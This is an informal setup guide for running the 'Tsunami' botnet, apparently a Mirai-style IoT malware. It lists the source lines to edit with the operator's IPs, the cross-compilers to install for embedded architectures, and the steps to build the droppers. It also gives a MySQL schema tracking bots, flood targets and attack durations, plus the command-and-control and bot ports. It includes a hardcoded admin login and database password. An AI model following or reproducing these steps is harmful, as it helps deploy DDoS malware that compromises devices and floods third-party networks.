					[ $ ~ tsunami setup ~ $ ]
				    [ $ ~ setup  made by empire  ~ $ ]
------------------------------------------------------------------
change ips:
scan.c //Line 93
scan.c //Line 618
main.c //Line 129
main.go//Line 41, 47, 53
r.go   //Line 16
probs some more, look through the headers and main files
------------------------------------------------------------------
installing shit:
------------------------------------------------------------------
yum update -y 
yum install epel-release -y 
yum groupinstall "Development Tools" -y 
yum install gmp-devel -y 
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10 
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y

rm -rf /usr/local/go 
wget https://dl.google.com/go/go1.10.3.linux-amd64.tar.gz 
sha256sum go1.10.3.linux-amd64.tar.gz 
sudo tar -C /usr/local -xzf go1.10.3.linux-amd64.tar.gz 
export PATH=$PATH:/usr/local/go/bin 
source ~/.bash_profile 
rm -rf go1.10.3.linux-amd64.tar.gz

mkdir /etc/xcompile 
cd /etc/xcompile 
wget https://github.com/foss-for-synopsys-dwc-arc-processors/toolchain/releases/download/arc-2017.09-release/arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2 
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2 
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2 

tar -xzf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2 
tar -jxf cross-compiler-mips.tar.bz2 
tar -jxf cross-compiler-mipsel.tar.bz2 
tar -jxf cross-compiler-powerpc.tar.bz2 
tar -jxf cross-compiler-sh4.tar.bz2 
tar -jxf cross-compiler-sparc.tar.bz2 
tar -jxf cross-compiler-armv4l.tar.bz2 
tar -jxf cross-compiler-armv5l.tar.bz2 
tar -jxf cross-compiler-armv6l.tar.bz2 
tar -jxf cross-compiler-armv7l.tar.bz2 
tar -jxf cross-compiler-x86_64.tar.bz2 
rm -rf *.tar.bz2 
mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install arc
mv cross-compiler-i586 i586 
mv cross-compiler-m68k m68k 
mv cross-compiler-i686 i686
mv cross-compiler-mips mips 
mv cross-compiler-mipsel mipsel 
mv cross-compiler-powerpc powerpc 
mv cross-compiler-sh4 sh4 
mv cross-compiler-sparc sparc 
mv cross-compiler-armv4l armv4l 
mv cross-compiler-armv5l armv5l 
mv cross-compiler-armv6l armv6l 
mv cross-compiler-armv7l armv7l 
mv cross-compiler-x86_64 x86_64 

cd /tmp
wget https://dl.google.com/go/go1.14.1.linux-amd64.tar.gz -q
tar -xvf go1.14.1.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords

------------------------------------------------------------------
installing mysql for cent os 7:
------------------------------------------------------------------
sudo yum localinstall https://dev.mysql.com/get/mysql80-community-release-el7-1.noarch.rpm -y
sudo yum install mysql-community-server -y
sudo systemctl enable mysqld
sudo systemctl start mysqld
sudo systemctl status mysqld
sudo grep 'temporary password' /var/log/mysqld.log
ALTER USER 'root'@'localhost' IDENTIFIED BY 'Tsunami1337$#'; 
------------------------------------------------------------------
installing iptables for cent os 7:
------------------------------------------------------------------
sudo yum install iptables-services -y
sudo systemctl start iptables
sudo systemctl start ip6tables
sudo systemctl enable iptables
sudo systemctl enable ip6tables
sudo systemctl status iptables
sudo systemctl status ip6tables
sudo iptables -nvL
sudo ip6tables -nvL
------------------------------------------------------------------
creating database:
------------------------------------------------------------------
Type: mysql -p // will ask you for a password just input the password you put in at the "ALTER USER" line
Now just paste this:

CREATE DATABASE net;
use net;
CREATE TABLE `users`
(
    `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
    `username` varchar(32) NOT NULL,
    `password` varchar(32) NOT NULL,
    `max_bots` int(11) DEFAULT '-1',
    `max_time` int(11) DEFAULT '-1',
    `admin` int(10) unsigned DEFAULT '0',
    `logged_in` int(10) unsigned DEFAULT '0',
    `flood_cooldown` int(11) DEFAULT '0',
    PRIMARY KEY (`id`),
    KEY `username` (`username`)
);
INSERT INTO `net`.`users` (`id`, `username`, `password`, `max_bots`, `max_time`, `admin`, `logged_in`, `flood_cooldown`) VALUES (NULL, 'Tekio', 'root', '-1', '-1', '2', '0', '0');
CREATE TABLE `log`
(
    `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  	`user` varchar(32) NOT NULL,
  	`duration` int(10) unsigned NOT NULL,
  	`max_bots` int(11) DEFAULT '-1',
  	`command` text NOT NULL,
    `targets` text NOT NULL,
    `port` int(10) unsigned NOT NULL,
    `timestamp` int(10) unsigned NOT NULL,
    PRIMARY KEY (`id`),
  	KEY `user` (`user`)
);
exit;
------------------------------------------------------------------
now restart iptables, http and mysql:
------------------------------------------------------------------
service iptables stop 
service httpd restart  
service mysqld restart
------------------------------------------------------------------
now run the compiler:
------------------------------------------------------------------
just copy and paste the whole build.sh file and paste in your vps
------------------------------------------------------------------
after running the build were gonna build the droppers:
------------------------------------------------------------------
cd /dropper; sh build.sh
------------------------------------------------------------------
now run:
------------------------------------------------------------------
nano /usr/include/bits/typesizes.h
------------------------------------------------------------------
ctrl+v twice then change the 1024 to 999999
------------------------------------------------------------------
then ctrl+x, y, enter to save
------------------------------------------------------------------
now run:
------------------------------------------------------------------
ulimit -n 999999; ulimit -u 999999; ulimit -e 999999
------------------------------------------------------------------
now screen the cnc:
------------------------------------------------------------------
screen ./cnc
------------------------------------------------------------------
tsunami cnc-port: 7654
tsunami bot-port: 7685
tsunami reflection-port: 8989
------------------------------------------------------------------
when you login you will be on a black screen just type "debug" and it should bring you to the login screen
------------------------------------------------------------------

